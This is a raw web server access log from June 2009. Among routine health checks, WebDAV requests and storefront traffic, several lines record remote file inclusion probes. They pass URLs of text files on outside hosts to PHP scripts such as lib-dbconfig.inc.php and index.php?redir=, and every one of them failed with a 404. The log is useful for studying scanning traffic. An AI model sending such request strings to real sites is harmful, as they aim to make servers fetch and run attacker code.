77.221.152.82 - - [10/Jun/2009:07:52:10 -0400] "GET /logs/access_log.Q109053100/errors.php?error=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
66.11.230.36 - - [10/Jun/2009:07:52:30 -0400] "GET //libraries/lib-dbconfig.inc.php=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
66.11.230.36 - - [10/Jun/2009:07:52:30 -0400] "GET /logs//libraries/lib-dbconfig.inc.php=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
66.11.230.36 - - [10/Jun/2009:07:52:30 -0400] "GET /logs/access_log.Q109052800//libraries/lib-dbconfig.inc.php=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:07:52:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.88 - - [10/Jun/2009:07:52:56 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [10/Jun/2009:07:52:56 -0400] "PROPFIND /CA400 HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [10/Jun/2009:07:52:56 -0400] "PROPFIND /CA400 HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [10/Jun/2009:07:52:56 -0400] "PROPFIND /CA400 HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [10/Jun/2009:07:52:58 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [10/Jun/2009:07:52:58 -0400] "PROPFIND /QIbm HTTP/1.1" 405 230 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
66.11.230.36 - - [10/Jun/2009:07:53:09 -0400] "GET /logs/error_log.Q109052800//libraries/lib-dbconfig.inc.php=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
79.20.15.100 - - [10/Jun/2009:07:53:31 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):titanium%20augmentation%20mesh HTTP/1.1" 200 38035 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
66.11.230.36 - - [10/Jun/2009:07:53:47 -0400] "GET /logs/access_log.Q109052800%20%20//libraries/lib-dbconfig.inc.php=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
66.11.230.36 - - [10/Jun/2009:07:54:08 -0400] "GET /logs/error_log.Q109052800%20%20//libraries/lib-dbconfig.inc.php=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
124.0.146.100 - - [10/Jun/2009:07:54:30 -0400] "GET /logs/access_log.Q109052800//libraries/lib-dbconfig.inc.php=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
124.0.146.100 - - [10/Jun/2009:07:54:30 -0400] "GET //libraries/lib-dbconfig.inc.php=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
124.0.146.100 - - [10/Jun/2009:07:54:30 -0400] "GET /logs//libraries/lib-dbconfig.inc.php=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
70.61.119.142 - - [10/Jun/2009:07:54:30 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F884E4F5217000F6E046+M37+ENG HTTP/1.1" 200 69608 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F88464D02F700059E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
89.223.3.98 - - [10/Jun/2009:07:54:33 -0400] "GET /index.php?redir=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:07:54:33 -0400] "GET /logs/index.php?redir=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:07:54:33 -0400] "GET /logs/access_log.Q108062200/index.php?redir=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
70.61.119.142 - - [10/Jun/2009:07:54:42 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F884D4DB2F700DA5E046+M37+ENG HTTP/1.1" 200 69201 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F884E4F5217000F6E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:54:57 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F884940626700EB4E046+M37+ENG HTTP/1.1" 200 54523 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F884D4DB2F700DA5E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
124.0.146.100 - - [10/Jun/2009:07:55:08 -0400] "GET /logs/error_log.Q109052800//libraries/lib-dbconfig.inc.php=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
70.61.119.142 - - [10/Jun/2009:07:55:09 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L001F88484BC26700FD6E046+M37+ENG HTTP/1.1" 200 69201 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001F884940626700EB4E046+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
